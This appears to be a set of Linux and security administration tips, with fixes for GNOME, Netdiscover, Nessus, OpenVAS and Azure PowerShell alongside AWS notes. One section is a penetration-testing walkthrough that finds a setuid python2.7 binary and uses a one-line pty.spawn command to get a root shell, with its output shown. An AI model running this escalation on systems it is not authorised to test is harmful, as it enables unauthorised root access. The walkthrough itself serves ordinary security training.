Clicking on Places in Linux displays CHIRPS message

When clicking on Places in Linux, a message is displayed advising you to disable error reporting (shown as a CHIRPS message). This can be caused by a broken file manager installation within the GNOME Desktop configuration, for example file manager dependencies that were removed by a previously issued apt-get autoremove or equivalent command.

To fix this issue, reinstall the GNOME file manager packages. The steps below fetch specific package revisions from a Debian mirror and install them with dpkg; run them as root (or with sudo). Two caveats: dpkg -i performs no signature check on a manually downloaded .deb (apt verifies the repository's signed Release file before installing anything), so where apt itself still works, apt install --reinstall libgnome-desktop-3-18 gnome-desktop3-data nautilus is the safer route; and the exact filenames below stop resolving once the mirror moves to a newer package revision, so adjust them to what the pool directory currently lists.

1. Download the lib files for GNOME desktop:
wget http://ftp.br.debian.org/debian/pool/main/g/gnome-desktop3/libgnome-desktop-3-18_3.34.1-1_amd64.deb

2. Download the data files for GNOME desktop:
wget http://ftp.br.debian.org/debian/pool/main/g/gnome-desktop3/gnome-desktop3-data_3.34.1-1_all.deb

3. Install GNOME data files package:
dpkg -i gnome-desktop3-data_3.34.1-1_all.deb

4. Install GNOME lib files package:
dpkg -i libgnome-desktop-3-18_3.34.1-1_amd64.deb

5. Install Nautilus file manager with apt:
apt install nautilus

With the file manager reinstalled, clicking on Places should perform the correct action.

Netdiscover running on NAT interface not finding IP addresses on host-only network

Netdiscover, commonly found in Kali Linux, can in certain circumstances fail to discover and list the IP addresses on your local area network (LAN), especially when the tool is run inside a virtual machine whose network adapter is attached in NAT mode.

Netdiscover works by sending Address Resolution Protocol (ARP) requests, which resolve IP addresses to MAC addresses, and listing the hosts that reply. ARP is a layer 2 protocol carried in Ethernet broadcasts; by design it does not cross boundaries segregated by layer 3 routing or by switch virtual interfaces (SVIs) operating at layer 3, because those devices do not forward ARP frames.

In NAT mode the hypervisor places the VM on its own private virtual network and routes (and address-translates) its traffic through the host. The VM's ARP broadcasts therefore never leave the virtual switch, and the hosts on the physical LAN, or on a separate host-only network, sit in a different broadcast domain that ARP cannot reach.

For Netdiscover to work, configure your virtualised environment to use a Bridged network adapter, which attaches the VM's virtual NIC to the same layer 2 segment as the host's physical NIC. The VM then receives an address on the physical LAN and its ARP requests reach every host on that segment. To scan a host-only network instead, attach an adapter to that host-only network and point Netdiscover at that interface and its range (netdiscover -i <interface> -r <range>).

To configure Bridged networking for your environment, consult your virtualisation software's documentation.
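The check below is an added example, not part of the original post and not netdiscover's own code: it computes whether a target address sits on the same subnet as the scanning interface (the only case in which an ARP request can reach it) and derives the network/prefix to pass to netdiscover -r. The interface and target addresses in it are constructed for the demonstration.

```sh
#!/bin/sh
# Added example (not part of the original post). Before handing a range to
# netdiscover -r, check that it shares a layer 2 segment with the interface you
# will scan from: ARP requests are broadcast, never routed, so a target outside
# the interface's own subnet can never answer them. Addresses are constructed:
# 10.0.2.15/24 is the sort of private address a NAT adapter receives and
# 192.168.1.0/24 stands in for the physical LAN.

ip2int() {
    # dotted quad -> 32-bit integer, POSIX arithmetic only
    set -- $(printf '%s' "$1" | tr '.' ' ')
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

int2ip() {
    # 32-bit integer -> dotted quad
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

prefix2mask() {
    # /24 -> 4294967040 (0xFFFFFF00); /0 is special-cased because a 32-bit
    # shift is undefined in shell arithmetic
    if [ "$1" -eq 0 ]; then echo 0; else echo $(( (0xFFFFFFFF << (32 - $1)) & 0xFFFFFFFF )); fi
}

scan_range() {
    # scan_range <iface_ip/prefix> -> the network/prefix to pass to netdiscover -r
    mask=$(prefix2mask "${1#*/}")
    echo "$(int2ip $(( $(ip2int "${1%/*}") & mask )))/${1#*/}"
}

same_segment() {
    # same_segment <iface_ip/prefix> <target_ip>: exit 0 if the target is on the
    # interface's subnet (reachable by ARP), 1 if it is behind a layer 3 hop
    mask=$(prefix2mask "${1#*/}")
    [ $(( $(ip2int "${1%/*}") & mask )) -eq $(( $(ip2int "$2") & mask )) ]
}

check_target() {
    # human-readable verdict for one interface address and one target
    if same_segment "$1" "$2"; then
        echo "$2 is on $(scan_range "$1"): ARP discovery from $1 can see it"
    else
        echo "$2 is NOT on $(scan_range "$1"): ARP discovery from $1 cannot see it (attach a bridged or host-only adapter on that segment)"
    fi
}

# Constructed scenario: a NAT-attached VM and a bridged VM, both looking for a
# LAN host at 192.168.1.50. Only the bridged one shares its broadcast domain.
check_target 10.0.2.15/24    192.168.1.50
check_target 192.168.1.77/24 192.168.1.50
```

On a live system, feed same_segment the address that ip -o -4 addr show dev <interface> reports for the interface netdiscover will use; if the verdict is negative, no amount of scanning from that adapter will find the host.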

DISA SRG/STIG Library

The DISA SRG/STIG Library can be used during static analysis of a security architecture and in system design reviews. It also serves as a reference during design assurance activities, to confirm that system configuration follows recognised good practice. SRGs state technology-independent requirements; STIGs apply them to a specific product or version.

Link: DISA SRG/STIG Library

The SRG/STIG Library can also be browsed through a STIG viewer at stigviewer.com, a third-party site; treat the copies DISA publishes as the authoritative ones.

Nessus has detected that API access on this scanner is disabled.

Nessus displays warning “Nessus has detected that API access on this scanner is disabled” during usage.

To fix this issue, stop the Nessus service, reset its configuration, start Nessus again and then register it using your previous activation code. Note that nessuscli fix --reset returns the scanner's settings to their defaults and removes the existing registration, so have the activation code to hand before you begin. On systemd hosts, systemctl stop nessusd and systemctl start nessusd are the equivalents of the service commands below.

1. Stop the Nessus service:
service nessusd stop

2. Reset the configuration:
/opt/nessus/sbin/nessuscli fix --reset

3. Start the Nessus service:
service nessusd start

4. Register Nessus using your previous registration key:
/opt/nessus/sbin/nessuscli fetch --register xxxx-xxxx-xxxx-xxxx-xxxx

5. Log in to Nessus and update the plugins.

How to Install Azure PowerShell Module

To install the Azure PowerShell module, follow the steps below. Note that AzureRM is the legacy module: Microsoft retired it on 29 February 2024 in favour of the Az module, and the same steps work with Az in place of AzureRM (Install-Module Az). Install-Module pulls from the PowerShell Gallery and prompts for confirmation if that repository is not marked as trusted; -AllowClobber lets the module install commands whose names collide with commands already present on the system.

1. Open Windows PowerShell from your system, using the Run as administrator option.

2. From within the PowerShell command window, enter the following command:

Install-Module AzureRM -AllowClobber

3. Import the AzureRM module within PowerShell, using the following command:

Import-Module AzureRM

4. Validate the AzureRM module is installed properly, by using the following command:

Get-Module -ListAvailable AzureRM

If AzureRM module has been successfully installed, you should see output within PowerShell that looks similar to below:

PS C:\WINDOWS\system32> Get-Module -ListAvailable AzureRM

    Directory: C:\Program Files\WindowsPowerShell\Modules

ModuleType Version    Name       ExportedCommands
---------- -------    ----       ----------------
Script     6.13.1     AzureRM

OpenVAS Administrator Password Reset

To reset the password of the OpenVAS administrator account (admin), use the following command:

openvasmd --user=admin --new-password=admin_password

This form changes the password of an existing user. To create an additional user, use --create-user instead (the generated password is printed), then set a password of your choosing with the --user/--new-password form above:

openvasmd --create-user=new_user
openvasmd --user=new_user --new-password=user_password

On Greenbone Vulnerability Management 10 and later, openvasmd was renamed gvmd and takes the same options (gvmd --user=admin --new-password=admin_password).

Searching for binaries for privilege escalation exploit

During the attack phase of a penetration test, once a shell has been obtained, the next goal is usually to own the system by escalating privileges to root. Start by confirming the identity the shell is running as, using id; this shows the real uid, gid and supplementary groups we start from, and is the baseline to compare against after escalation:

$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

Then use the following command to list the executables on the system that have the setuid bit set:

find / -perm -u=s -type f 2>/dev/null

Here find searches from the root directory (/) for files whose permission bits include the owner's setuid bit (-perm -u=s; -perm -4000 is the equivalent numeric form), restricted to regular files (-type f). Standard error is redirected to the null device (2>/dev/null) so that the Permission denied messages from directories the current user cannot read are suppressed, while the matches still print to standard output.

Example shown below:

$ find / -perm -u=s 2>/dev/null
/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount

Note that if standard output had been redirected instead (> or 1>), the matches would have vanished and only the Permission denied errors, which go to standard error, would remain on the terminal. Most entries in the listing above are binaries that routinely carry the setuid bit (passwd, su, mount and so on). /usr/bin/python2.7 stands out: no distribution ships a setuid interpreter, so it is the obvious candidate for escalation. We can use the following command to exploit it:

/usr/bin/python2.7 -c 'import pty;pty.spawn("/bin/sh")'

Because python2.7 here is setuid root, the interpreter starts with an effective UID of 0, and the /bin/sh it spawns on a pseudo-terminal inherits that (Debian's /bin/sh is dash, which does not drop an inherited effective UID; bash would, unless started with -p). The result is a root shell, as the following commands show:

# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# whoami
root

The shell now runs with root privileges: the real uid is still 1000, but euid=0(root) is present and whoami, which reports the effective user, prints root. To make the real uid root as well, call os.setuid(0) from the setuid interpreter before spawning the shell; a privileged process may set all three of its user IDs that way.
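The script below is an added example, not part of the original post: it automates the enumeration above and diffs the result against a baseline of binaries expected to be setuid, so that an oddity like a setuid python2.7 stands out without reading the whole list by eye. The baseline is constructed from the listing on this page (minus python2.7); on a real engagement or audit, capture it from a known-good build of the same image rather than trusting this one.

```sh
#!/bin/sh
# Added example (not part of the original post): enumerate setuid files under a
# directory and report any that are not on a baseline of binaries expected to
# carry the bit. On a real system run audit_dir / against a baseline captured
# from a known-good build of the same image; the BASELINE below is constructed
# from the listing shown on this page, minus /usr/bin/python2.7, which no
# distribution ships setuid. (mawk is not normally setuid either and would
# deserve a second look on a real host; it is kept here to match the page.)

LC_ALL=C; export LC_ALL   # sort and comm must agree on collation

BASELINE='/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount'

find_setuid() {
    # $1 = directory to search. -perm -4000 is the numeric, POSIX form of
    # -perm -u=s; -type f restricts to regular files; 2>/dev/null discards the
    # "Permission denied" noise sent to stderr. Output is sorted for comm.
    find "$1" -perm -4000 -type f 2>/dev/null | sort
}

unexpected_setuid() {
    # Reads candidate paths on stdin and prints those absent from BASELINE.
    base=$(mktemp)
    printf '%s\n' "$BASELINE" | sort > "$base"
    sort | comm -13 "$base" -
    rm -f "$base"
}

audit_dir() {
    # Paths under $1 that carry the setuid bit but are not on the baseline.
    find_setuid "$1" | unexpected_setuid
}

# Constructed demonstration: the listing from this page, fed through the triage,
# leaves only the binary worth attacking.
printf '%s\n' "$BASELINE" /usr/bin/python2.7 | unexpected_setuid
```

The setuid bit hands out the file owner's privileges, not necessarily root's, so when triaging a real result also check ownership (ls -l on each flagged path); a setuid binary owned by an unprivileged service account is a lateral step, not a root shell.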

Amazon AWS VPC Components

Amazon AWS VPC consists of the following components:

  1. An Internet Gateway or a Virtual Private Gateway (a VPC can have at most one internet gateway attached at a time)
  2. Route Tables, which decide where traffic leaving a subnet is sent
  3. Network Access Control Lists (NACLs), applied at the subnet level and stateless, so return traffic must be allowed explicitly
  4. Security Groups, applied at the instance (network interface) level and stateful, so return traffic for an allowed connection is admitted automatically
  5. VPC Flow Logs, which record accepted and rejected traffic metadata at the VPC, subnet or network interface level

Example bash script for cloud environments

The following bash script example can be used to automate some basic tasks associated with setting up a virtual resource, such as an Amazon AWS EC2 instance, when it is supplied as the instance's user data:

#!/bin/bash
# EC2 user data: runs once, as root, on first boot (Amazon Linux 1 / SysV init).
yum update -y
yum install httpd -y
service httpd start
chkconfig httpd on
# The bucket name is missing from the URI as published; supply it, and attach an
# IAM role to the instance that allows s3:GetObject on the object.
aws s3 cp s3:///index.html /var/www/html/

This script updates the instance's packages (yum update) and installs the Apache web server (yum install httpd). It was used in Amazon AWS for an EC2 instance serving a static website whose content was stored in an S3 bucket.

The script also starts Apache and makes it persist across reboots (chkconfig, the SysV init tool on Amazon Linux 1; on systemd-based images use systemctl enable --now httpd), and the last instruction copies the site's index.html from the S3 bucket into Apache's document root. The bucket name is missing from the s3:// URI on this page and must be supplied. Two caveats: user data runs as root and is readable from the instance metadata service, so keep it minimal and free of secrets; and the aws s3 cp call only succeeds if the instance has an IAM role granting s3:GetObject on the object, which is the mechanism to use rather than embedding access keys.

List of Tenable Nessus plugin families

AIX Local Security Checks
Amazon Linux Local Security Checks
Backdoors
Brute force attacks
CentOS Local Security Checks
CGI abuses
CGI abuses : XSS
CISCO
Databases
Debian Local Security Checks
Default Unix Accounts
Denial of Service
DNS
F5 Networks Local Security Checks
Fedora Local Security Checks
Firewalls
FreeBSD Local Security Checks
FTP
Gain a shell remotely
General
Gentoo Local Security Checks
HP-UX Local Security Checks
Huawei Local Security Checks
Incident Response
Junos Local Security Checks
MacOS X Local Security Checks
Mandriva Local Security Checks
Misc.
Netware
Oracle Linux Local Security Checks
OracleVM Local Security Checks
Palo Alto Local Security Checks
Peer-To-Peer File Sharing
PhotonOS Local Security Checks
Red Hat Local Security Checks
RPC
SCADA
Scientific Linux Local Security Checks
Service detection
Settings
Slackware Local Security Checks
SMTP problems
SNMP
Solaris Local Security Checks
SuSE Local Security Checks
Ubuntu Local Security Checks
Virtuozzo Local Security Checks
VMware ESX Local Security Checks
Web Servers
Windows
Windows : Microsoft Bulletins
Windows : User management